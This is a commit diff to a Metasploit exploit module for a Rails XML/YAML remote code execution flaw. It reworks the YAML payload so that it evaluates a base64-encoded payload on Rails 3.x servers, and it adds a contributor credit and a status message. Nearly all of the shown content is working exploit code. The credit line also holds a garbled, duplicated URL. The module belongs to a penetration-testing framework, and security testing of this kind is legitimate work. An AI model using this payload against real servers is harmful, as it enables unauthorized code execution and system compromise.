This restores functionality across all rails 3.x

Author: HD Moore

modules/exploits/multi/http/rails_xml_yaml_code_exec.rb

@@ -27,7 +27,8 @@ def initialize(info = {})
 					'charlisome',  # PoC
 					'espes',       # PoC and Metasploit module
 					'toothfairy',  # Anonymous contributor
-					'hdm'          # Module merge/conversion/payload work
+					'hdm',         # Module merge/conversion/payload work
+					'Postmodern'   # The __END__ trick from https:https://gist.github.com/4499206//gist.github.com/4499206
 				],
 			'License'        => MSF_LICENSE,
 			'References'  =>
@@ -87,8 +88,10 @@ def build_yaml
 		code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
 		yaml =
 			"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
-			"'; (eval(%[#{code}].unpack(%[m0])[0]); @e=true) unless @e #':" +
-			" !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
+			"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
+			"eval(%[#{code}].unpack(%[m0])[0]);' " +
+			": !ruby/object:OpenStruct\n table:\n  :defaults: {}\n"
+		yaml
 	end
 
 
@@ -137,6 +140,7 @@ def build_request
 	#
 	def exploit
 		data = build_request
+		print_status("Sending #{data.length} bytes to #{rhost}:#{rport}...")
 		res = send_request_cgi({
 			'uri'    => datastore['URIPATH'] || "/",
 			'method' => datastore['HTTP_METHOD'],